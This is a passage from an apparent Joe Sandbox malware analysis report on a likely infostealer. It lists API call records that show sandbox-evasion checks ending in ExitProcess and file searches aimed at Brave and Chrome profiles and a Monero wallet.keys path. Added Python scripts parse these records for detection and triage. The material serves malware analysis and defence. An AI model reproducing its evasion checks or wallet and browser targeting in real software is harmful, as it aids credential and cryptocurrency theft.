                            • Instruction Fuzzy Hash: BA014BB098030CEAEB14EBE4CC49BAEBB79BB04701F608548E705B62C0D7785541879D
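The control_flow_graph lines of this record and of the OpenEventA / CreateEventA record above are a flattened export of a rendered graph: a node id, the block's address range, its callees and API names, then `src->dst` edges. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin; it recovers blocks and edges from that text (both lines are embedded as constructed input, copied from the raw export), finds back edges (loops) and blocks that end in ExitProcess, and emits Graphviz DOT so the graph can be redrawn offline. The token grammar and the `sub_` prefix for callee addresses are my reading of the export format, inferred from these two lines only.

```python
import re
from collections import defaultdict

# Constructed input: the flattened "control_flow_graph ..." text of two function records on this
# page, copied from the raw report export (a browser renders it as a graph).
CFG_EVENT_LOOP = (
    "control_flow_graph 1436 606af3 1437 606b0a 1436->1437 1439 606aba-606ad7 call 60aad0 "
    "OpenEventA 1437->1439 1440 606b0c-606b22 call 606920 call 605b10 CloseHandle ExitProcess "
    "1437->1440 1446 606af5-606b04 CloseHandle Sleep 1439->1446 1447 606ad9-606af1 call 60aad0 "
    "CreateEventA 1439->1447 1446->1437 1447->1440"
)
CFG_MEMORY_CHECK = (
    "control_flow_graph 1493 5f1220-5f1247 call 6089b0 GlobalMemoryStatusEx 1496 5f1249-5f1271 "
    "call 60da00 * 2 1493->1496 1497 5f1273-5f127a 1493->1497 1499 5f1281-5f1285 1496->1499 "
    "1497->1499 1501 5f129a-5f129d 1499->1501 1502 5f1287 1499->1502 1504 5f1289-5f1290 "
    "1502->1504 1505 5f1292-5f1294 ExitProcess 1502->1505 1504->1501 1504->1505"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")                    # "1436->1437"
ADDR_RE = re.compile(r"^[0-9a-f]{5,8}(-[0-9a-f]{5,8})?$")  # "606af3" or "606aba-606ad7"


def parse_cfg(text):
    """Recover (nodes, edges) from the flattened graph text.

    Token grammar as inferred from the export (assumption): "<id> <addr[-addr]>" opens a block,
    "call <addr>" names a callee inside it, "* <k>" repeats the previous callee k times in total,
    "<src>-><dst>" is an edge, and any other token is an API called from the current block.
    nodes: {id: {"addr": str, "calls": [str]}} in first-seen order; edges: [(src, dst)].
    """
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    nodes, edges, current, i = {}, [], None, 1
    while i < len(tokens):
        tok, nxt = tokens[i], tokens[i + 1] if i + 1 < len(tokens) else ""
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current, i = None, i + 1
        elif tok.isdigit() and ADDR_RE.match(nxt):
            current = int(tok)
            nodes[current] = {"addr": nxt, "calls": []}
            i += 2
        elif current is None:
            i += 1                                    # stray token outside any block
        elif tok == "call" and nxt:
            nodes[current]["calls"].append("sub_" + nxt)
            i += 2
        elif tok == "*" and nxt.isdigit():
            calls = nodes[current]["calls"]
            calls.extend([calls[-1]] * (int(nxt) - 1))
            i += 2
        else:
            nodes[current]["calls"].append(tok)
            i += 1
    return nodes, edges


def back_edges(nodes, edges):
    """Edges that close a cycle on a DFS from the entry block (the first block listed): loops."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    state, found = {}, []                             # state: 1 = on DFS stack, 2 = finished

    def visit(u):
        state[u] = 1
        for v in succ[u]:
            if state.get(v) == 1:
                found.append((u, v))
            elif v not in state:
                visit(v)
        state[u] = 2

    visit(next(iter(nodes)))
    return found


def exit_blocks(nodes):
    """Blocks that terminate the process instead of returning."""
    return [nid for nid, n in nodes.items() if "ExitProcess" in n["calls"]]


def to_dot(nodes, edges, name="cfg"):
    """Graphviz DOT text; pipe it into `dot -Tpng` to get the picture back."""
    lines = [f"digraph {name} {{", "  node [shape=box fontname=monospace];"]
    for nid, n in nodes.items():
        label = "\\n".join([n["addr"]] + n["calls"])
        lines.append(f'  n{nid} [label="{label}"];')
    lines += [f"  n{src} -> n{dst};" for src, dst in edges] + ["}"]
    return "\n".join(lines)


if __name__ == "__main__":
    for text in (CFG_EVENT_LOOP, CFG_MEMORY_CHECK):
        nodes, edges = parse_cfg(text)
        print(f"{len(nodes)} blocks, {len(edges)} edges, loops {back_edges(nodes, edges)}, "
              f"exit blocks {[nodes[b]['addr'] for b in exit_blocks(nodes)]}")
        print(to_dot(nodes, edges))
```

For the event function the only back edge is 606af5-606b04 -> 606b0a, i.e. the CloseHandle / Sleep block loops back to the OpenEventA test, and the single exit block is the one that calls sub_606920 and sub_605b10 before ExitProcess; the GlobalMemoryStatusEx function has no loop and one ExitProcess block reachable from two predecessors.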
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00607917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0060792F
                            Memory Dump Source and IDA Plugin snapshot: identical to those listed in full for the first function record above (source dump at offset 005F0000, snapshot hcaresult_0_2_5f0000_file.jbxd)
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 181a6c1d624cc2895e2733a8bfa7f82a923a442430a504c32a04fb5cb42f616f
                            • Instruction ID: 73c35fa54244f65b7bd7d2c7f63ddf809a6c216754c052600dfb6355ed9aa16f
                            • Opcode Fuzzy Hash: 181a6c1d624cc2895e2733a8bfa7f82a923a442430a504c32a04fb5cb42f616f
                            • Instruction Fuzzy Hash: 410186B1944204EBC704DF98DD45BABBBB8FB44B21F104629F545E32C0C37559048BA1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005F112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 005F1132
                            • ExitProcess.KERNEL32 ref: 005F1143
                            Memory Dump Source and IDA Plugin snapshot: identical to those listed in full for the first function record above (source dump at offset 005F0000, snapshot hcaresult_0_2_5f0000_file.jbxd)
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 6094570cf4ddb38fa7c51e7256db51ee68e301e0f45cfa2ec671734de21455ba
                            • Instruction ID: 19960d90252fb2ffee4f6c75d7c0bcf44feb1358a354f82cf92d1e8e60be5345
                            • Opcode Fuzzy Hash: 6094570cf4ddb38fa7c51e7256db51ee68e301e0f45cfa2ec671734de21455ba
                            • Instruction Fuzzy Hash: CAE0E67094534CFBE7146BA0DC0EB197A78BB44B01F104454F749765D0D6B52640969D
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005F10B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005F10F7
                            Memory Dump Source and IDA Plugin snapshot: identical to those listed in full for the first function record above (source dump at offset 005F0000, snapshot hcaresult_0_2_5f0000_file.jbxd)
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 05a858a21576b4e3d0006691147385f847666fd8fdd858e7160813641588ab6a
                            • Instruction ID: 2fbd1b4d0ea1d0c690b5e823fdd7558e37f48811c3bcc6e8d3adf5a2e5970735
                            • Opcode Fuzzy Hash: 05a858a21576b4e3d0006691147385f847666fd8fdd858e7160813641588ab6a
                            • Instruction Fuzzy Hash: 62F0E971641208BBE71496A89C49FBBB7DCE705715F300848F644E3280D5715F00CA94
                            APIs
                              • Part of subcall function 006078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607910
                              • Part of subcall function 006078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00607917
                              • Part of subcall function 006078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0060792F
                              • Part of subcall function 00607850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005F11B7), ref: 00607880
                              • Part of subcall function 00607850: RtlAllocateHeap.NTDLL(00000000), ref: 00607887
                              • Part of subcall function 00607850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0060789F
                            • ExitProcess.KERNEL32 ref: 005F11C6
                            Memory Dump Source and IDA Plugin snapshot: identical to those listed in full for the first function record above (source dump at offset 005F0000, snapshot hcaresult_0_2_5f0000_file.jbxd)
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 1c1d14a27356a79e4d16850b96e9f88f33c442bf93b758fcebdaf7c21e8775f3
                            • Instruction ID: a2499f1dd95baa59af225f9043965b5ad7e625a26dd25f8bf01c75796d4de268
                            • Opcode Fuzzy Hash: 1c1d14a27356a79e4d16850b96e9f88f33c442bf93b758fcebdaf7c21e8775f3
                            • Instruction Fuzzy Hash: D2E0ECA5A5460956CA4873B0AC0BB2B369D7B54745F040828BA4592582FA29F800856E
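The API rows in these records print the stack words at each call site as raw hex, which is all the report gives for the short check routines above (GlobalMemoryStatusEx then ExitProcess, GetCurrentProcess / VirtualAllocExNuma then ExitProcess, a large VirtualAlloc / VirtualFree pair, GetComputerNameA / GetUserNameA then ExitProcess, and the OpenEventA / CreateEventA / Sleep routine). The script below is an added example and not part of the report: it parses those rows (copied verbatim as constructed input), maps the flag words to their Win32 SDK names, and applies three triage heuristics of my own, an environment-query API that is followed directly by ExitProcess, the OpenEventA / Sleep / CreateEventA combination, and a VirtualAlloc of 100 MB or more immediately released again. Reading the five words printed for GetCurrentProcess as the arguments already pushed for the VirtualAllocExNuma call that follows is likewise my assumption, not something the report states.

```python
import re

# Constructed input: API rows copied verbatim from five function records on this page, one record
# per blank-line-separated block, exactly as the report prints them.
REPORT_API_LINES = """\
• GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005F123E
• ExitProcess.KERNEL32 ref: 005F1294

• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005F112B
• VirtualAllocExNuma.KERNEL32(00000000), ref: 005F1132
• ExitProcess.KERNEL32 ref: 005F1143

• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005F10B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005F10F7

  • Part of subcall function 006078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0060792F
  • Part of subcall function 00607850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0060789F
• ExitProcess.KERNEL32 ref: 005F11C6

• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014089E0,?,0061110C,?,00000000,?,00611110,?,00000000,00610AEF), ref: 00606ACA
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00606AE8
• Sleep.KERNEL32(00001770), ref: 00606B04
• ExitProcess.KERNEL32 ref: 00606B22
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Win32 SDK names (winnt.h / winbase.h) for the flag words that occur in these rows.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PAGE_PROT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
EVENT_ALL_ACCESS, SIZEOF_MEMORYSTATUSEX = 0x1F0003, 0x40
# Environment-query APIs; a record that calls one and then ExitProcess is an exit-on-check gate.
CHECK_APIS = {"GlobalMemoryStatusEx", "VirtualAllocExNuma", "GetComputerNameA", "GetUserNameA"}

def hexval(word):
    """Stack word as printed -> int, or None for '?' (value not recovered by the plugin)."""
    try:
        return int(word, 16)
    except ValueError:
        return None

def parse_records(text):
    """Split the API rows into records (blank-line separated) of parsed calls."""
    records, current = [], []
    for line in text.splitlines() + [""]:
        if not line.strip():
            if current:
                records.append(current)
            current = []
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.append({"api": m["api"], "args": args, "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return records

def flag_names(value, table):
    names = [name for bit, name in table.items() if value is not None and value & bit]
    return "|".join(names) if names else str(value)

def decode(call):
    """Readable notes for the stack words that are real parameters of the call."""
    api, a = call["api"], [hexval(w) for w in call["args"]]
    if api == "Sleep" and a:
        return [f"sleep {a[0]} ms"]
    if api == "VirtualAlloc" and len(a) >= 4:
        return [f"size {a[1]:,} bytes", flag_names(a[2], MEM_FLAGS), PAGE_PROT.get(a[3], str(a[3]))]
    if api == "VirtualFree" and len(a) >= 3:
        return [flag_names(a[2], MEM_FLAGS)]
    if api == "OpenEventA" and a and a[0] == EVENT_ALL_ACCESS:
        return ["dwDesiredAccess = EVENT_ALL_ACCESS"]
    if api == "GlobalMemoryStatusEx" and a and a[0] == SIZEOF_MEMORYSTATUSEX:
        return ["dwLength = sizeof(MEMORYSTATUSEX)"]
    if api == "GetCurrentProcess" and len(a) >= 5:
        # GetCurrentProcess has no parameters, so these words are what the caller pushed beforehand;
        # reading them as the pending VirtualAllocExNuma(lpAddress, dwSize, flAllocationType,
        # flProtect, nndPreferred) arguments is an assumption that matches the call that follows.
        return [f"pending alloc: {a[1]} bytes, {flag_names(a[2], MEM_FLAGS)}, "
                f"{PAGE_PROT.get(a[3], str(a[3]))}, NUMA node {a[4]}"]
    return []

def evasion_findings(record):
    """Triage heuristics added here (not the report's own signatures) over one function record."""
    apis = [c["api"] for c in record]
    findings = []
    if "ExitProcess" in apis:
        exit_ref = record[apis.index("ExitProcess")]["ref"]
        findings += [f"exit-on-check: {api} result gates ExitProcess at {exit_ref:08X}"
                     for api in apis[:apis.index("ExitProcess")] if api in CHECK_APIS]
    if {"OpenEventA", "CreateEventA", "Sleep"} <= set(apis):
        findings.append("single-instance wait: OpenEventA / Sleep loop before CreateEventA")
    for call, following in zip(record, record[1:]):
        size = hexval(call["args"][1]) if call["api"] == "VirtualAlloc" and len(call["args"]) > 1 else None
        if size and size >= 100 * 1024 * 1024 and following["api"] == "VirtualFree":
            findings.append(f"large allocation probe: VirtualAlloc {size:,} bytes then VirtualFree")
    return findings
```

Run `parse_records(REPORT_API_LINES)` and feed each record to `decode` and `evasion_findings`. Two values worth noting for detection content: Sleep(0x1770) is a 6000 ms retry delay, and the VirtualAlloc size 0x17C841C0 is exactly 399,000,000 bytes, a hard-coded constant that is a usable rule anchor on its own.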
                            APIs
                            • wsprintfA.USER32 ref: 006038CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 006038E3
                            • lstrcat.KERNEL32(?,?), ref: 00603935
                            • StrCmpCA.SHLWAPI(?,00610F70), ref: 00603947
                            • StrCmpCA.SHLWAPI(?,00610F74), ref: 0060395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00603C67
                            • FindClose.KERNEL32(000000FF), ref: 00603C7C
                            Memory Dump Source and IDA Plugin snapshot: identical to those listed in full for the first function record above (source dump at offset 005F0000, snapshot hcaresult_0_2_5f0000_file.jbxd)
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 5dbf1a800f7712277810fe1261d8a282a8f8db4ae88e93499f36ec97d052e0b3
                            • Instruction ID: 1d125a89ae19e8d50763766b8eec57713cb22d22a215f4c68faa0115c8fe157a
                            • Opcode Fuzzy Hash: 5dbf1a800f7712277810fe1261d8a282a8f8db4ae88e93499f36ec97d052e0b3
                            • Instruction Fuzzy Hash: 94A162B1A402189FDB28DFA4DC85FFA737DBB94301F044588B64D96281EB759B84CF62
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00610B32,00610B2B,00000000,?,?,?,006113F4,00610B2A), ref: 005FBEF5
                            • StrCmpCA.SHLWAPI(?,006113F8), ref: 005FBF4D
                            • StrCmpCA.SHLWAPI(?,006113FC), ref: 005FBF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FC7BF
                            • FindClose.KERNEL32(000000FF), ref: 005FC7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: b8097e73686ab1dde6b08aba3cadcfc96af421acc70d0d378aeb904000fb6a72
                            • Instruction ID: 2a5fe819e0c2a02b6c7f618e72d80c44a4fed5548f7fb9550decf9455ac985c5
                            • Opcode Fuzzy Hash: b8097e73686ab1dde6b08aba3cadcfc96af421acc70d0d378aeb904000fb6a72
                            • Instruction Fuzzy Hash: 9A42957195020897CB58FBB0DD96EEF773EAB94340F40856CB906960C1EF349B49CB96
                            APIs
                            • wsprintfA.USER32 ref: 0060492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00604943
                            • StrCmpCA.SHLWAPI(?,00610FDC), ref: 00604971
                            • StrCmpCA.SHLWAPI(?,00610FE0), ref: 00604987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00604B7D
                            • FindClose.KERNEL32(000000FF), ref: 00604B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 7e696e83b37a71d026832ec6761364f75eb5d4c00ba998a10c708c30fd9b80f5
                            • Instruction ID: dabebe04c0b642b6df42c1ca9feddd2360c78b22438e46f455b4c4cc24f89e6d
                            • Opcode Fuzzy Hash: 7e696e83b37a71d026832ec6761364f75eb5d4c00ba998a10c708c30fd9b80f5
                            • Instruction Fuzzy Hash: 9A6136B1500218ABCB28EBA0DC49FEB737DBB98701F04859CB64996181EF75DB85CF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00604580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00604587
                            • wsprintfA.USER32 ref: 006045A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 006045BD
                            • StrCmpCA.SHLWAPI(?,00610FC4), ref: 006045EB
                            • StrCmpCA.SHLWAPI(?,00610FC8), ref: 00604601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0060468B
                            • FindClose.KERNEL32(000000FF), ref: 006046A0
                            • lstrcat.KERNEL32(?,0140E540), ref: 006046C5
                            • lstrcat.KERNEL32(?,0140CFF8), ref: 006046D8
                            • lstrlen.KERNEL32(?), ref: 006046E5
                            • lstrlen.KERNEL32(?), ref: 006046F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 1096103f201c6971911064898cf5989502c62d928dc579930d4e2ca1c392b893
                            • Instruction ID: fcd18d50e5c990162ff76fc2fbe75f3cff6439675666a45364cb3db188e30808
                            • Opcode Fuzzy Hash: 1096103f201c6971911064898cf5989502c62d928dc579930d4e2ca1c392b893
                            • Instruction Fuzzy Hash: 4B5155B15402189FCB68EB70DC89FEA737DBB98300F404998F68992190EF75DB858F91
                            APIs
                            • wsprintfA.USER32 ref: 00603EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00603EDA
                            • StrCmpCA.SHLWAPI(?,00610FAC), ref: 00603F08
                            • StrCmpCA.SHLWAPI(?,00610FB0), ref: 00603F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0060406C
                            • FindClose.KERNEL32(000000FF), ref: 00604081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 68c654e0ecde6b541ecada8901756362059b7c945c5f19a06f70f2dd08cb27a3
                            • Instruction ID: f886ace87de43d57e5994c5592b669bab4e3a6abda0fba20edc7b0c41334ff2e
                            • Opcode Fuzzy Hash: 68c654e0ecde6b541ecada8901756362059b7c945c5f19a06f70f2dd08cb27a3
                            • Instruction Fuzzy Hash: 5D5168B1900218AFCB28FBB4DC85EEA737DBB84300F00459CB79996180DB75DB858F55
                            APIs
                            • wsprintfA.USER32 ref: 005FED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 005FED55
                            • StrCmpCA.SHLWAPI(?,00611538), ref: 005FEDAB
                            • StrCmpCA.SHLWAPI(?,0061153C), ref: 005FEDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FF2AE
                            • FindClose.KERNEL32(000000FF), ref: 005FF2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
